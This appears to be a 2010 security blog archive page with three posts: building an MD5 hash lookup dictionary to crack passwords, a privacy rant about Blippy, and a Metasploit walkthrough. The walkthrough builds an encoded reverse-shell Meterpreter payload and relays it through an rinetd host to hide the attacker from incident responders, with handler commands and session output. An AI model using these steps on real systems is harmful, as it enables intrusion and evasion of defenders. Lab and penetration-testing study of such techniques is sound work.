Monthly Archives: April 2010

Code, Posts

Creating an md5sum hash dictionary file

Leave a comment

If you’re ever put in a situation where you need to assess the strength of passwords that may be stored in an md5sum, there are a few options you have:

There are numerous websites for cracking md5sums such as:

http://passcracking.com

The simple way I assess how these websites is by searching for a very simple md5sum that can be generated via:

echo password | md5sum -;

Also, you could just merely, google the md5sum and see if you can find the unciphered text. That being said, the point of this post though, is to generate an md5sum hash dictionary. Let’s look at a simple word list.

cat wordlist.txt | head 
aaaaa
aaaab
aaaac
aaaad
aaaae
aaaaf
aaaag
aaaah
aaaai
aaaaj

We will then, use a for loop and append the output of each iteration, to a file simply by doing:

for i in `cat wordlist.txt`; do echo ${i} >> hashdict.txt; echo ${i} | md5sum - >> hashdict.txt; done

Now in our hashdict.txt file, we have our unciphered text and then on the next line, it’s md5sum equivalent. Ergo, if we want to look up a hash some and find the unciphered text, we could do as follows:

egrep --before-context=1 '4ab36a961cd2198e4a49915f820db5c0' hashdict.txt
aaaae

We have now found out that ‘4ab36a961cd2198e4a49915f820db5c0’ is equivalent to ‘aaaae’.

Similarly, if we wanted to find md5sum equivalent of ‘aaaae’ , we could use the list, or just simply do:

echo aaaae | md5sum -

I’ll have more to come. In the next few days, I’m going to work on my ‘ettersploit’, idea.

Posts

Blippy FAIL rant

3 Comments

mashable.com/2010/04/23/blippy-credit-card-numbers/

Alright, sharing information is nothing new, along with sharing information online. We as a society aggregate massive amounts of data for companies to use for targeted marketing and the like.

With that being said, you must ask yourself, “Our we willingly sharing too much information?” Is there such a thing as a too much information? Some would argue no and for the most part I would have to agree with them. Despite this being true, I still strongly believe that reasonable forms of denial are a useful tool for coping with everyday life.

Twitter, facebook, myspace.. and even the faded out xanga, are all websites that are used for basically spying on our social lives. With this being said, Blippy steps up the ante by spying on our buying habits and having a space for us to publicly share this information.

Was I a little surprised to find out about the latest ‘Blippy fail’ ? A little, but the more I took into consideration and remembered how Google can be used in such a way, it wasn’t very hard for me to fathom.

Is there an easy mend for this issue? You have to ask yourself, especially if you’re a Blippy user, “Do I really need to share this information, with this company and the realm of the internet?”.

My mantra on disclosing information is, ‘share information as felt necessary’. I hope more people start taking this into consideration, but it seems that people tend to like to live in the view of the public to an extent via social networking mediums. I believe for some individuals, it gives them a sense of identity and self importance.

Do I really care about who broke up with such and so? Is it necessary for me to learn about unnecessary information about yourself? I don’t think so, but social networking websites seem to think it’s necessary, but it’s also part of their business model.

Consider this simple logic: The more websites that I share personal information with, the more likely a privacy breach of information that I did not intend to disclose will occur.

More to come..

Posts

metasploit + rinetd fun

1 Comment

A pentester might find his/her self in a situation where they might want to obfuscate the out going connection of their payload.

Now, my first idea was to use rinetd, but also a netcat relay came to mind as well. Nevertheless, my netcat relay did not work for this case.

Before I continue on, I should be explicit on what I want to do:

Create a payload that connects reversely to a host that acts a relay to the attackers host.

What are the benefits to this? Obfuscation of course. When the incidence response team takes action and possibly gets a copy of the payload, to reverse engineer it, they will notice that it connects to a host that may seem benign.
Also, the corporate firewall might only allow out going connections on specific ports and the pentester’s server might have to listen on some odd ball port due to ISP restrictions.

For redirecting I’ll be using rinetd. My three hosts are which as follows:

Host A = 192.168.1.2 (Attacker)
Host B = 192.168.1.3 (Relay host)
Host C = 192.168.1.4 (Victim)

For my payload I’ll be using a new method implemented into metasploit, which is located here:
http://blog.metasploit.com/2010/04/persistent-meterpreter-over-reverse.html

First lets create the payload:

msfpayload windows/meterpreter/reverse_https LHOST=192.168.1.3 LPORT=8080 R | msfencode -t loop-vbs -c 10 -o rineme.vbs

Next let’s setup our attacker’s handler on host 192.168.1.2:
msf> use multi/handler
msf exploit(handler) > set LHOST 192.168.1.2
LHOST => 192.168.1.2
msf exploit(handler) > set LPORT 8081
LPORT => 8081
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > exploit

[*] HTTPS listener started on https://192.168.1.2:8081/
[*] Starting the payload handler..

Next I’ll set up the relay host to relay my connection.

rinetd -c config.conf

Where config.conf is simply:

192.168.1.3 8080 192.168.1.2 8081

This way, when the payload is executed and connects to the relay host (192.168.1.3) on port 8080, the relay host will redirect the connection to the attacker’s host at 192.168.1.2 at port 8081.

Once the payload gets executed on the victim host (192.168.1.4) we should see something like this:

[*] 192.168.1.3:36716 Request received for /A0KET…

[*] 192.168.1.3:36716 Staging connection for target 0KET received…

[*] Patching Target ID 0KET into DLL

[*] 192.168.1.4:49286 Request received for /B0KET…

[*] 192.168.1.4:49286 Stage connection for target 0KET received…

[*] Meterpreter session 1 opened (192.168.1.2:8081 -> 192.168.1.4:49286)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1..
meterpreter > ipconfig
Software Loopback Interface 1
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask    : 255.0.0.0

Intel(R) PRO/1000 MT Desktop Adapter
Hardware MAC: 08:00:27:a1:52:61
IP Address  : 192.168.1.4
Netmask     : 255.255.255.0

More to come…